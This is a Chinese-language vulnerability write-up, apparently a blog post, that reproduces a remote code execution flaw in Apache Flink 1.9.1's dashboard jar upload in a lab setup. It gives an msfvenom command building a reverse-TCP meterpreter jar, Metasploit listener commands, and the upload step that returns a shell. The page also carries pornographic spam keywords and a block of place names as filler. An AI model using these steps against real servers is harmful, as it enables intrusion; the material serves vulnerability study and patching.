亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

發布時間:2021-12-28 15:27:02 來源:億速云 閱讀:242 作者:小新 欄目:安全技術

這篇文章給大家分享的是有關Apache Flink任意Jar包上傳致RCE漏洞的示例分析的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

0x01漏洞概述

攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的

0x02影響范圍

到目前Apache Flink 1.9.1版本

0x03環境搭建

攻擊機:kali

受害機:ubuntu16

1. 安裝java8環境,自行百度教程

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

2. 下載Flink1.9.1版本,然后解壓安裝包

Flink下載地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解壓 tar -zxvf

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

3. 進入bin目錄運行./start-cluster.sh啟動環境

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

4.在瀏覽器打開,出現以下界面表示安裝成功

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

0x04漏洞復現

1. 首先使用kali生成jar的后門包

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

2.使用msfconsole監聽shell設置的端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

3.run開啟監聽

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

4.把制作好的shell.jar包訪問目標站點并上傳shell.jar

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

5.點擊Submit觸發漏洞,反彈回了shell

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

0x05修復建議

更新官方補丁或更新最新版本

感謝各位的閱讀!關于“Apache Flink任意Jar包上傳致RCE漏洞的示例分析”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

黑龙江省| 乌兰浩特市| 谷城县| 星子县| 德保县| 彭州市| 博爱县| 湖南省| 饶平县| 临西县| 凤庆县| 漳浦县| 区。| 抚州市| 深泽县| 贵港市| 滦平县| 莒南县| 新邵县| 东乡| 突泉县| 明光市| 竹山县| 白玉县| 南江县| 申扎县| 水富县| 景宁| 赞皇县| 永昌县| 磐石市| 黑龙江省| 宁武县| 聂拉木县| 亚东县| 确山县| 长葛市| 永济市| 成都市| 磐安县| 浪卡子县|